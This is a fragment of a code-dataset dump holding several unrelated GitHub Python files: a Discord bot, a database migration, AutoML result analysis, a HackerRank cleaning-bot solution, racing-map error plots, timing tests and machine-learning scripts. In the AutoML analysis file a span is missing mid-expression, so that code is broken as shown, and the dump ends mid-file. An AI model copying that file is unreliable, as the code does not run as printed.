cookbooks[int(row[int('level')])-1].append(row)\n","repo_name":"jcpinyan/simmer","sub_path":"recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5408804962","text":"# pip install nextcord\nimport nextcord\nfrom nextcord.ext import commands\nimport os\nimport time\n\n\nprint(\"MUST HAVE TURNED ALL THE INTENTS ON IN THE BOT SETTINGS\")\ntime.sleep(1)\nprint(\"To do that go to : https://discord.com/developers/applications/\")\nintents = nextcord.Intents.all()\nintents.members = True\n\ntoken = input(\"What's your bot's token? [You can check our code that we **DO NOT** store discord bot token] : \")\nprefix = input(\"Bot prefix? : \")\nbot_status = input(\"What should be the bot's status? : \")\nprint(\"After the bot is online, do the command, prefixdo_that, [EG: !do_that, $do_that]\")\n\nclient = commands.Bot(command_prefix=prefix, intents=intents)\nclient.remove_command('help')\n\n@client.event\nasync def on_ready():\n print(\"Your bot is online\")\n await client.change_presence(activity=nextcord.Game(name=bot_status))\n\n@client.command()\nasync def send_message(ctx):\n message = input(\"What's the message that you want to send? : \")\n await ctx.send(message)\n\ntoken = open(\"TOKEN\", \"r\").read()\nclient.run(token)\n","repo_name":"RomeandAlphaGuylol/ChatFromDiscordBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11926677557","text":"\"\"\"bd softwares timestamp\n\nRevision ID: 3251458bf6f0\nRevises: 4ae782f1bed5\nCreate Date: 2020-03-23 21:47:46.412140\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '3251458bf6f0'\ndown_revision = '4ae782f1bed5'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('softwares', sa.Column('timestamp', sa.DateTime(), nullable=True))\n op.create_index(op.f('ix_softwares_timestamp'), 'softwares', ['timestamp'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_softwares_timestamp'), table_name='softwares')\n op.drop_column('softwares', 'timestamp')\n # ### end Alembic commands ###\n","repo_name":"pbaesse/dados-livres","sub_path":"migrations/versions/3251458bf6f0_bd_softwares_timestamp.py","file_name":"3251458bf6f0_bd_softwares_timestamp.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"27589934234","text":"import pickle\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.model_selection import cross_val_score\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import get_recall\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import time_score2\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import get_avg_runtime\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import get_optimum_avg_runtime\n\nfrom sklearn.metrics import make_scorer\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn import tree\nfrom sklearn.tree import export_graphviz\nfrom subprocess import call\nfrom sklearn.model_selection import LeaveOneGroupOut\nfrom sklearn.model_selection import GroupKFold\nfrom sklearn.model_selection import RandomizedSearchCV\nimport copy\nimport glob\nimport matplotlib.pyplot as plt\n\ndef is_pareto_efficient_simple(costs):\n \"\"\"\n Find the pareto-efficient points\n :param costs: An (n_points, n_costs) array\n :return: A (n_points, ) boolean array, indicating whether each point is Pareto efficient\n \"\"\"\n is_efficient = np.ones(costs.shape[0], dtype = bool)\n for i, c in enumerate(costs):\n if is_efficient[i]:\n is_efficient[is_efficient] = np.any(costs[is_efficient] 0 and 'success_test' in exp_results[-1] and exp_results[-1]['success_test'] == True #also on test satisfied\n\ndef is_successfull_validation(exp_results):\n\treturn len(exp_results) > 0 and 'Validation_Satisfied' in exp_results[-1] # constraints were satisfied on validation set\n\nnumber_ml_scenarios = 1200\nrun_count = 0\nfor efolder in experiment_folders:\n\trun_folders = sorted(glob.glob(efolder + \"*/\"))\n\tfor rfolder in run_folders:\n\t\ttry:\n\t\t\tinfo_dict = pickle.load(open(rfolder + 'run_info.pickle', \"rb\"))\n\t\t\trun_strategies_success_test = {}\n\t\t\trun_strategies_times = {}\n\t\t\trun_strategies_success_validation = {}\n\n\t\t\tvalidation_satisfied_by_any_strategy = False\n\n\t\t\tmin_time = np.inf\n\t\t\tbest_strategy = 0\n\t\t\tfor s in range(1, len(mappnames) + 1):\n\t\t\t\texp_results = []\n\t\t\t\ttry:\n\t\t\t\t\texp_results = load_pickle(rfolder + 'strategy' + str(s) + '.pickle')\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\tif is_successfull_validation_and_test(exp_results):\n\t\t\t\t\truntime = exp_results[-1]['final_time']\n\t\t\t\t\tif runtime < min_time:\n\t\t\t\t\t\tmin_time = runtime\n\t\t\t\t\t\tbest_strategy = s\n\n\t\t\t\t\trun_strategies_success_test[s] = True\n\t\t\t\t\trun_strategies_times[s] = runtime\n\t\t\t\telse:\n\t\t\t\t\trun_strategies_success_test[s] = False\n\n\t\t\t\trun_strategies_success_validation[s] = is_successfull_validation(exp_results)\n\t\t\t\tif run_strategies_success_validation[s]:\n\t\t\t\t\tvalidation_satisfied_by_any_strategy = True\n\n\t\t\tdataset['success_value'].append(run_strategies_success_test)\n\t\t\tdataset['success_value_validation'].append(run_strategies_success_validation)\n\t\t\tdataset['best_strategy'].append(best_strategy)\n\t\t\tdataset['times_value'].append(run_strategies_times)\n\t\t\tdataset['validation_satisfied'].append(validation_satisfied_by_any_strategy)\n\n\t\t\tdataset['max_search_time'].append(info_dict['constraint_set_list']['search_time'])\n\t\t\tdataset['dataset_id'].append(info_dict['dataset_id'])\n\n\t\t\trun_count += 1\n\t\texcept FileNotFoundError:\n\t\t\tpass\n\t\tif run_count == number_ml_scenarios:\n\t\t\tbreak\n\tif run_count == number_ml_scenarios:\n\t\tbreak\n\nassert len(dataset['success_value']) == len(dataset['best_strategy'])\n\njoined_strategies = []\n\n\nmap_data_2_fastest = {}\n\nfor run in range(len(dataset['best_strategy'])):\n\tif dataset['best_strategy'][run] != 0:\n\t\tfor s in range(1, len(mappnames) + 1):\n\n\t\t\tif not dataset['dataset_id'][run] in map_data_2_fastest:\n\t\t\t\tmap_data_2_fastest[dataset['dataset_id'][run]] = {}\n\t\t\tif not s in map_data_2_fastest[dataset['dataset_id'][run]]:\n\t\t\t\tmap_data_2_fastest[dataset['dataset_id'][run]][s] = []\n\n\t\t\tif s == dataset['best_strategy'][run]:\n\t\t\t\tmap_data_2_fastest[dataset['dataset_id'][run]][s].append(True)\n\t\t\telse:\n\t\t\t\tmap_data_2_fastest[dataset['dataset_id'][run]][s].append(False)\n\n\n\nprint(map_data_2_fastest)\n\n\n\ndata = {}\n\nlatex = \"\"\n\n\n#\\putpie{\\pie{benchmark}{20/TPE(Variance),}\\hfill\ncountizt = 1\nfor key_data, value_data in map_data_2_fastest.items():\n\tlatex += \"\\putpie{\\pie{}{\"\n\tfor i in range(1, len(mappnames) + 1):\n\t\tpercent_fastest = (np.sum(value_data[i]) / float(len(value_data[i])) *100)\n\t\tif percent_fastest > 0:\n\t\t\tlatex += str(percent_fastest) + \"/\" + str(mappnames[i]) + ','\n\n\tlatex += \"}}{\" + map_dataset2name[key_data] +\"}\"\n\tif countizt % 4 != 0:\n\t\tlatex += '\\hfill\\n'\n\telse:\n\t\tlatex += \"\\\\\\\\[2ex]\\n\"\n\tcountizt += 1\n\nprint(latex)","repo_name":"BigDaMa/DFS","sub_path":"new_project/fastsklearnfeature/interactiveAutoML/new_bench/multiobjective/metalearning/analyse/for_validation/strategy_fastest_piechart_per_dataset_val.py","file_name":"strategy_fastest_piechart_per_dataset_val.py","file_ext":"py","file_size_in_byte":8131,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"42971171315","text":"#!/usr/bin/python\n\n# Head ends here\n\ndef update_position(posr, posc, board, move):\n if(move == \"CLEAN\"):\n return()\n elif(move == \"RIGHT\"):\n aux = list(board[posr])\n aux[posc] = \"-\"\n aux[posc+1] = \"b\"\n \n board[posr] = \"\".join(aux)\n posc = posc+1\n elif(move == \"LEFT\"):\n aux = list(board[posr])\n aux[posc] = \"-\"\n aux[posc-1] = \"b\"\n \n board[posr] = \"\".join(aux)\n posc = posc-1\n elif(move == \"UP\"):\n aux = list(board[posr])\n aux2 = list(board[posr-1])\n aux[posc] = \"-\"\n aux2[posc] = \"b\"\n \n board[posr] = \"\".join(aux)\n board[posr-1] = \"\".join(aux2)\n posr = posr - 1\n elif(move == \"DOWN\"):\n aux = list(board[posr])\n aux2 = list(board[posr+1])\n aux[posc] = \"-\"\n aux2[posc] = \"b\"\n \n board[posr] = \"\".join(aux)\n board[posr+1] = \"\".join(aux2)\n posr = posr + 1\n \n return(posr, posc, board)\n\ndef next_move(posr, posc, board):\n if(board[posr][posc] == \"d\"):\n return(\"CLEAN\")\n \n # find all dirty cell positions\n dirties_pos = []\n for idx,value in enumerate(board):\n if(\"d\" in value):\n for col in [i for i,j in enumerate(list(value)) if j==\"d\"]:\n dirties_pos.append([idx,col])\n if(len(dirties_pos)==0):\n return()\n \n # find nearest position\n min_pos = []\n min_dis = 100\n for d in dirties_pos:\n cur_dis = abs(d[0] - posr) + abs(d[1] - posc)\n if(cur_dis < min_dis):\n min_dis = cur_dis\n min_pos = d\n \n direction_h = posc - min_pos[1]\n direction_v = posr - min_pos[0]\n\n if(direction_h < 0):\n return(\"RIGHT\")\n elif(direction_h > 0):\n return(\"LEFT\")\n\n if(direction_v < 0):\n return(\"DOWN\")\n elif(direction_v > 0):\n return(\"UP\")\n\n# Tail starts here\n\nif __name__ == \"__main__\":\n pos = [int(i) for i in input().strip().split()]\n board = [[j for j in input().strip()] for i in range(5)]\n print(next_move(pos[0], pos[1], board))\n\n# i = 0\n# while(\"d\" in \"\".join(board)): \n# move = next_move(pos[0], pos[1], board)\n# pos[0], pos[1], board = update_position(pos[0], pos[1], board, move)\n# print()\n# print(str(i) + \": \" + move)\n# for row in board:\n# print(row)\n \n# i = i + 1 \n","repo_name":"d-gaspar/HackerRank","sub_path":"Artificial_Intelligence/BotClean.py","file_name":"BotClean.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75192374121","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport csv\nfrom scipy import interpolate\nfrom LocalMapRacing.Utilities.utils import ensure_path_exists\n\n\nclass MapCenterline:\n def __init__(self, map_name):\n track = []\n with open(\"maps/\" + map_name + \"_trueCenterline.csv\", 'r') as file:\n csvFile = csv.reader(file)\n for i, line in enumerate(csvFile):\n if i ==0: continue\n track.append(line)\n\n track = np.array(track).astype(np.float64)\n self.track = np.insert(track, 0, [0, 0, 0.95, 0.95, 0, -1], axis=0)\n self.nvecs = self.track[:, 4:6]\n\n diffs = np.diff(self.track[:, :2], axis=0)\n seg_lengths = np.linalg.norm(np.diff(self.track[:, :2], axis=0), axis=1)\n seg_lengths = np.linalg.norm(diffs, axis=1)\n self.s_track = np.insert(np.cumsum(seg_lengths), 0, 0)\n\n self.tck, t_glob = interpolate.splprep([self.track[:, 0], self.track[:, 1]], k=3, s=0)[:2]\n\n print(self.track[0])\n\n def plot_centerline(self):\n plt.figure(1)\n plt.plot(self.track[:,0], self.track[:,1], 'r-')\n l1 = self.track[:, :2] + self.track[:, 2][:, None] * self.nvecs\n l2 = self.track[:, :2] - self.track[:, 3][:, None] * self.nvecs\n plt.plot(l1[:,0], l1[:,1], 'b-')\n plt.plot(l2[:,0], l2[:,1], 'b-')\n\n plt.show()\n\n def calucalte_center_point(self, point):\n idx, distances = self.get_trackline_segment(point)\n x, h = self.interp_pts(idx, distances)\n s = (self.s_track[idx] + x) / self.s_track[-1]\n\n c_point = interpolate.splev(s, self.tck)\n h_true = np.linalg.norm(c_point - point)\n\n return c_point, s, h_true\n\n def get_trackline_segment(self, point):\n \"\"\"Returns the first index representing the line segment that is closest to the point.\n\n wpt1 = pts[idx]\n wpt2 = pts[idx+1]\n\n dists: the distance from the point to each of the wpts.\n \"\"\"\n dists = np.linalg.norm(point - self.track[:, :2], axis=1)\n\n min_dist_segment = np.argmin(dists)\n if min_dist_segment == 0:\n return 0, dists\n elif min_dist_segment == len(dists)-1:\n return len(dists)-2, dists \n\n if dists[min_dist_segment+1] < dists[min_dist_segment-1]:\n return min_dist_segment, dists\n else: \n return min_dist_segment - 1, dists\n\n def interp_pts(self, idx, dists):\n if idx == len(self.s_track) - 1:\n return 0, 0\n d_ss = self.s_track[idx+1] - self.s_track[idx]\n d1, d2 = dists[idx], dists[idx+1]\n\n if d1 < 0.01: # at the first point\n x = 0 \n h = 0\n elif d2 < 0.01: # at the second point\n x = dists[idx] # the distance to the previous point\n h = 0 # there is no distance\n else: # if the point is somewhere along the line\n s = (d_ss + d1 + d2)/2\n Area_square = (s*(s-d1)*(s-d2)*(s-d_ss))\n if Area_square < 0: # negative due to floating point precision\n h = 0\n x = d_ss + d1\n else:\n Area = Area_square**0.5\n h = Area * 2/d_ss\n x = (d1**2 - h**2)**0.5\n\n return x, h\n\n def plot_projection(self, pt):\n c_point, s, h_true = self.calucalte_center_point(pt)\n plt.plot(c_point[0], c_point[1], 'ro')\n plt.plot(pt[0], pt[1], 'go', markersize=5)\n xs = [pt[0], c_point[0]]\n ys = [pt[1], c_point[1]]\n plt.plot(xs, ys, '--', color='orange')\n\ndef calculate_centerline_area_error(name):\n map_name = \"aut\"\n map_centerline = MapCenterline(map_name)\n\n path = f\"Data/{name}/\"\n\n lm_path = path + \"LocalMapError/\"\n ensure_path_exists(lm_path)\n \n map_root = path + f\"LocalMapData_{map_name.upper()}/\"\n history = np.load(path + \"TestingAUT/\" + f\"Lap_0_history_{name}.npy\")\n states = history[:, 0:7]\n actions = history[:, 7:9]\n\n lm_errors = []\n for i in range(1, 260):\n file = map_root + f\"local_map_{i}.npy\"\n try:\n local_track = np.load(file)\n except Exception as e: \n print(e)\n break\n\n distances, progresses = [], []\n c_points = []\n position = states[i, 0:2]\n transformed_lm = []\n heading = states[i, 4]\n rotation_matrix = np.array([[np.cos(heading), -np.sin(heading)], \n [np.sin(heading), np.cos(heading)]])\n t_lm = np.matmul(rotation_matrix, local_track[:, :2].T).T\n for k in range(len(local_track)):\n pt = position + t_lm[k]\n transformed_lm.append(pt)\n c_point, s, h_true = map_centerline.calucalte_center_point(pt)\n distances.append(h_true)\n progresses.append(s)\n c_points.append(c_point)\n\n mean_dist = np.mean(distances)\n print(f\"Step {i}: {mean_dist}\")\n if mean_dist < 2:\n lm_errors.append(mean_dist)\n\n np.save(path + f\"local_map_error_{name}.npy\", lm_errors)\n\n plt.plot(lm_errors)\n\n plt.savefig(path + f\"local_map_error_{name}.svg\")\n\n\ndef calculate_centerline_area_error_plot(name):\n map_name = \"aut\"\n map_centerline = MapCenterline(map_name)\n\n path = f\"Data/{name}/\"\n\n lm_path = path + \"LocalMapError/\"\n ensure_path_exists(lm_path)\n \n map_root = path + f\"LocalMapData_{map_name.upper()}/\"\n history = np.load(path + \"TestingAUT/\" + f\"Lap_0_history_{name}.npy\")\n states = history[:, 0:7]\n actions = history[:, 7:9]\n\n lm_errors = []\n for i in range(1, 260):\n file = map_root + f\"local_map_{i}.npy\"\n try:\n local_track = np.load(file)\n except: break\n\n plt.figure(1)\n plt.clf()\n plt.title(f\"Step {i}\")\n plt.plot(map_centerline.track[:,0], map_centerline.track[:,1], 'r-')\n\n distances, progresses = [], []\n c_points = []\n position = states[i, 0:2]\n transformed_lm = []\n heading = states[i, 4]\n rotation_matrix = np.array([[np.cos(heading), -np.sin(heading)], \n [np.sin(heading), np.cos(heading)]])\n t_lm = np.matmul(rotation_matrix, local_track[:, :2].T).T\n for k in range(len(local_track)):\n pt = position + t_lm[k]\n transformed_lm.append(pt)\n c_point, s, h_true = map_centerline.calucalte_center_point(pt)\n distances.append(h_true)\n progresses.append(s)\n c_points.append(c_point)\n map_centerline.plot_projection(pt)\n\n transformed_lm = np.array(transformed_lm)\n plt.plot(transformed_lm[:,0], transformed_lm[:,1], 'g-')\n plt.xlim(np.min(transformed_lm[:, 0]) - 1, np.max(transformed_lm[:, 0]) + 1)\n plt.ylim(np.min(transformed_lm[:, 1]) - 1, np.max(transformed_lm[:, 1]) + 1)\n # plt.show()\n\n plt.savefig(lm_path + f\"local_map_error_{i}.svg\")\n\n\n np.save(path + f\"local_map_error_{name}.npy\", lm_errors)\n\n plt.plot(lm_errors)\n\n plt.savefig(path + f\"local_map_error_{name}.svg\")\n\n\n# calculate_centerline_area_error(\"LocalCenter_1\")\ncalculate_centerline_area_error_plot(\"LocalCenter_1\")","repo_name":"BDEvan5/LocalMapRacing","sub_path":"LocalMapRacing/DataTools/CalculateCenterLineError.py","file_name":"CalculateCenterLineError.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26371049600","text":"# import time module to calculate times \nimport time \n \n# initialise lists to save the times \nforLoopTime = [] \nwhileLoopTime = [] \nlistComprehensionTime = [] \nstarOperatorTime = [] \n \n# repeat the process for 500 times \n# and calculate average of times taken. \nfor k in range(500): \n \n # start time \n start = time.time() \n # declare empty list \n a = [] \n # run a for loop for 10000 times \n for i in range(10000): \n a.append(0) \n # stop time \n stop = time.time() \n forLoopTime.append(stop-start) \n \n # start time \n start = time.time() \n # declare an empty list \n a = [] \n i = 0\n # run a for loop 10000 times \n while(i<10000): \n a.append(0) \n i+= 1\n stop = time.time() \n whileLoopTime.append(stop-start) \n \n start = time.time() \n # list comprehension to initialize list \n a = [0 for i in range(10000)] \n stop = time.time() \n listComprehensionTime.append(stop-start) \n \n \n start = time.time() \n # using the * operator \n a = [0]*10000 \n stop = time.time() \n starOperatorTime.append(stop-start) \n \n \n \nprint(\"Average time taken by for loop: \" + str(sum(forLoopTime)/100)) \nprint(\"Average time taken by while loop: \" + str(sum(whileLoopTime)/100)) \nprint(\"Average time taken by list comprehensions: \" + str(sum(listComprehensionTime)/100)) \nprint(\"Average time taken by * operator: \" + str(sum(starOperatorTime)/100))\ninput()\n","repo_name":"Syed-Azam/Self_Learning_Creativity","sub_path":"Efficiency_Calculator.py","file_name":"Efficiency_Calculator.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"40440109967","text":"# rock = A = X = 1\n# paper = B = Y = 2\n# scissors = C = Z = 3\n# lose = 0\n# draw = 3\n# win = 6\n\n# total = shape selected (col 2) + result from col 2 perspective\n\n# Wins\n# Rock beats Scissors (C X)\n# Scissors beats Paper (B Z)\n# Paper beats Rock (A Y)\n\n# Ties \n# (A X)\n# (B Y)\n# (C Z)\n\n# Losses \n# Rock beats Scissors (A Z)\n# Scissors beats Paper (C Y)\n# Paper beats Rock (B X)\n\n# example: \n# A Y --> 8\n# B X --> 1\n# C Z --> 6\n# total score: 15\n\n# all possible wins, ties, losses, and second letters\nkey = {\n \"CX\": 6,\n \"BZ\": 6,\n \"AY\": 6,\n \"AX\": 3,\n \"BY\": 3,\n \"CZ\": 3,\n \"AZ\": 0,\n \"CY\": 0,\n \"BX\": 0,\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3\n}\n\ntotal_score = 0\n\nwith open('data.txt', 'r', encoding=\"utf-8\") as f:\n lines = f.readlines()\n\n for line in lines:\n # strip spaces and newlines\n parsed = line.replace(\" \", \"\").strip()\n # look up score for letter combo + final letter and add it to the \n # running total\n total_score += (key[parsed] + key[parsed[-1]])\n\nprint(total_score)","repo_name":"stocktons/advent-of-code-2022","sub_path":"day-02/rochambeau.py","file_name":"rochambeau.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8189078504","text":"from pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport xarray as xr\nfrom sklearn.model_selection import LeaveOneOut\n\nfrom models.model_base import DetektorModel\nfrom project_paths import ProjectPaths\nfrom evaluations import Accuracy, F1, TruePositives, TrueNegatives, FalsePositives, FalseNegatives, Samples, \\\n AreaUnderROC\nfrom evaluations.area_roc import plot_roc, ROC, plot_multiple_rocs, mean_rocs\nfrom models.baselines import MLP, LogisticRegression, LogisticRegressionSK\nfrom models.recurrent.basic_recurrent import BasicRecurrent\nfrom models.PositiveLearningElkan.pu_learning import PULogisticRegressionSK\nfrom util.tensor_provider import TensorProvider\nfrom util.utilities import ensure_folder, save_fig\n\n\ndef leave_one_program_out_cv(tensor_provider, model_list, path,\n eval_functions=None, limit=None, return_predictions=False,\n save_ranked_sentences=True, save_full_predictions=True,\n save_model_weights=True):\n \"\"\"\n :param TensorProvider tensor_provider: Class providing all data to models.\n :param list[DetektorModel] model_list: List of model-classes for testing.\n :param list[Evaluation] eval_functions: List of evaluation functions used to test models.\n :param bool return_predictions: If True, the method stores all model test-predictions and returns them as well.\n Can be used to determine whether errors are the same across models.\n :param int | None limit: Only perform analysis on some programs (for testing)\n If None - run on all programs.\n :param Path path: Path for storing results\n :return:\n \"\"\"\n ensure_folder(path)\n\n # TODO: Consider also looping over loss-functions: classic ones and weighed ones\n n_models = len(model_list)\n\n # Default evaluation score\n if eval_functions is None:\n eval_functions = [Accuracy(), F1(), TruePositives(), TrueNegatives(), FalsePositives(), FalseNegatives(),\n Samples(), AreaUnderROC(), ROC()]\n\n # Elements keys\n keys = list(sorted(tensor_provider.accessible_annotated_keys))\n\n # Get program ids and number of programs\n program_ids = np.array(list(zip(*keys))[0])\n unique_programs = np.array(sorted(set(program_ids)))\n n_programs = len(unique_programs)\n program_names = [\"P{:02d}\".format(val + 1) for val in range(n_programs)]\n\n # Dictionary for holding actual predictions (they vary in length which discourages an array)\n test_predictions = dict()\n\n # Initialize array for holding results\n special_results = dict()\n evaluation_names = [val.name() for val in eval_functions if val.is_single_value]\n classification_results = np.full((n_programs, n_models, len(evaluation_names)), np.nan)\n classification_results = xr.DataArray(classification_results,\n name=\"Loo Results\",\n dims=[\"Program\", \"Model\", \"Evaluation\"],\n coords=dict(Program=program_names,\n Model=[model.name for model in model_list],\n Evaluation=evaluation_names))\n\n # Initialize file for storing ranked sentences\n if save_ranked_sentences:\n rank_file = Path(path, \"ranked_sentences.txt\").open(\"w\")\n\n # Loop over programs\n loo = LeaveOneOut()\n limit = len(unique_programs) if limit is None else limit\n print(\"\\n\\nRunning Leave-One-Out Tests.\\n\" + \"-\" * 75)\n for program_nr, (train, test) in enumerate(list(loo.split(unique_programs))[:limit]):\n program_name = program_names[program_nr]\n\n # Get split indices\n train_idx = np.where(program_ids != unique_programs[test])[0]\n test_idx = np.where(program_ids == unique_programs[test])[0]\n\n # Convert to keys\n train_idx = [keys[val] for val in train_idx]\n test_idx = [keys[val] for val in test_idx]\n\n # Report\n print(\"Program {}, using {} training samples and {} test samples.\".format(program_nr + 1,\n len(train_idx),\n len(test_idx)))\n\n # Make and set BoW-vocabulary\n bow_vocabulary = tensor_provider.extract_programs_vocabulary(train_idx)\n tensor_provider.set_bow_vocabulary(bow_vocabulary)\n\n # Get truth of test-set\n y_true = tensor_provider.load_labels(data_keys_or_idx=test_idx)\n\n # Go through models\n for model_nr, model in enumerate(model_list):\n model_name = model.name\n\n # Initialize model\n model.initialize_model(tensor_provider=tensor_provider)\n\n # Fit model\n model.fit(tensor_provider=tensor_provider,\n train_idx=train_idx,\n verbose=2)\n\n # Predict on test-data for performance\n y_pred, y_pred_binary = model.predict(tensor_provider=tensor_provider,\n predict_idx=test_idx)\n y_pred = np.squeeze(y_pred)\n y_pred_binary = np.squeeze(y_pred_binary)\n\n # Store predictions\n if return_predictions:\n test_predictions.setdefault(model_name, dict())[program_name] = y_pred\n\n # Save the best ranked senteces (in terms of claim)\n if save_ranked_sentences:\n rank_file.write(\"Test program: %s \\n\" % program_names[program_nr])\n rank_file.write(model.summary_to_string())\n ranked_sentences, rank_score, rank_indices \\\n = tensor_provider.get_ranked_predictions(y_pred, test_idx)\n rank_file.write(\"Sentence, Proability of claim, Truth \\n\")\n ranked_labels = tensor_provider.load_labels(rank_indices)\n for r in range(len(ranked_sentences)):\n rank_file.write(\"%s , %.5f, %i \\n\" % (ranked_sentences[r], rank_score[r], ranked_labels[r]))\n rank_file.write(\"\\n\")\n\n # Save predictions on full test set\n if save_full_predictions:\n with Path(path, \"%s_predictions.txt\" % program_names[program_nr]).open(\"w\") as file:\n all_sentences = tensor_provider.load_original_sentences(test_idx)\n for r in range(len(all_sentences)):\n file.write(\"%i;%.5f;%s\\n\" % (y_true[r], y_pred[r], all_sentences[r]))\n\n # Save model weights in case of logistic regression\n if save_model_weights and model_name == \"LogisticRegressionSKLEARN\":\n # TODO: Save most important weights in classification\n print(' ')\n\n # Evaluate with eval_functions\n evaluation_nr = 0\n for evalf in eval_functions:\n assert y_pred.shape == y_true.shape, \"y_pred ({}) and y_true ({}) \" \\\n \"do not have same shape\".format(y_pred.shape, y_true.shape)\n\n if evalf.is_single_value:\n evaluation_result = evalf(y_true=y_true,\n y_pred=y_pred,\n y_pred_binary=y_pred_binary)\n classification_results[program_nr, model_nr, evaluation_nr] = evaluation_result\n evaluation_nr += 1\n else:\n special_results[(model.name, evalf.name(), program_nr)] = evalf(y_true=y_true,\n y_pred=y_pred,\n y_pred_binary=y_pred_binary)\n ###\n # Plot ROC curves if wanted\n\n # Go through models\n models_mean_rocs = []\n for model in model_list:\n rocs = []\n labels = []\n\n # Go through programs\n for program_nr in range(len(unique_programs)):\n key = (model.name, \"ROC\", program_nr)\n if key in special_results:\n rocs.append(special_results[key])\n labels.append(\"Program {}\".format(program_nr))\n\n # Plot ROCs for each program for this model\n plot_multiple_rocs(rocs=rocs, labels=labels, center_line=False)\n mean = mean_rocs(rocs)\n models_mean_rocs.append(mean)\n plot_roc(*mean, title=model.name, label=\"Mean\",\n color=\"black\", linestyle=\"--\")\n plt.legend()\n\n # Store figure\n file_name = \"ROC_{}\".format(model.name)\n save_fig(Path(path, file_name))\n plt.close()\n\n # Plot mean-ROCs for models\n names = [model.name for model in model_list]\n plot_multiple_rocs(rocs=models_mean_rocs, labels=names, center_line=True,\n title=\"Models Mean-ROC\")\n plt.legend()\n save_fig(Path(path, \"Models_ROC\"))\n plt.close()\n\n if save_ranked_sentences:\n rank_file.close()\n\n if return_predictions:\n return classification_results, special_results, test_predictions\n return classification_results, special_results\n\n\nif __name__ == \"__main__\":\n # Initialize tensor-provider (data-source)\n the_tensor_provider = TensorProvider(verbose=True)\n\n # Choose number of programs to run though (None for all)\n program_limit = None\n\n # Choose models\n models = [\n #PULogisticRegressionSK(tensor_provider=the_tensor_provider)\n MLP(tensor_provider=the_tensor_provider)\n ]\n\n # Run LOO-program\n loo_path = Path(ProjectPaths.results, \"LOO_CV\")\n results, s_results = leave_one_program_out_cv(\n tensor_provider=the_tensor_provider,\n model_list=models,\n limit=program_limit,\n path=loo_path\n ) # type: xr.DataArray\n\n # Get mean-results over programs\n mean_results = results.mean(\"Program\")\n mean_results.name = \"Mean Loo Results\"\n mean_results = mean_results._to_dataset_split(\"Model\").to_dataframe()\n\n # Print mean results\n print(\"\\nMean LOO Results\\n\" + \"-\" * 75)\n with Path(loo_path, \"mean_results.txt\").open(\"w\") as file:\n file.write(str(mean_results))\n print(mean_results)\n","repo_name":"DTUComputeCognitiveSystems/deep_detektor","sub_path":"run_files/loo_cv.py","file_name":"loo_cv.py","file_ext":"py","file_size_in_byte":10357,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"43161281780","text":"import cv2\n\ncap = cv2.VideoCapture(0)\n\nwhile cap.isOpened():\n ret, cam = cap.read() #ret -> True or False\n if ret:\n cv2.imshow(\"image\", cam)\n if cv2.waitKey(5) == ord(\"s\"):\n #save the image\n cv2.imwrite('image.jpg',cam)\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"haseeb-kp/ML","sub_path":"invisible cloak/background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70645499561","text":"# -*- coding: utf-8 -*-\n# @Time : 2020-02-21 16:04\n# @Author : HuangSir\n# @FileName: lgbParam.py\n# @Software: PyCharm\n# @Desc:lgb参数\n\nfrom hyperopt import hp\nimport numpy as np\n\nselectFeatures = 25 # 控制特征数\nearlyStopping = 50 # 控制早停\nmax_evals = 20 # 参数调优次数\nselect_num_boost_round = 1000 # 特征选择训练轮次\nvalTime = 20200120 # 划分验证集时间\n\n# 认为删除收费及不稳定变量\ndrop_col = ['iziScore','ad730Score','dianXinScore','company_province','identity_province','phoneverify']\n\n# 初始特征\nselfParam = {\n 'objective':'binary', # 二分类,默认是回归\n 'boosting':'dart', # 算法类型, gbdt,dart\n 'learning_rate':0.01, # 学习率\n 'max_depth':6, # 树的最大深度\n 'num_leaves':32, # 2**6 = 64\n 'max_cat_threshold':10, # 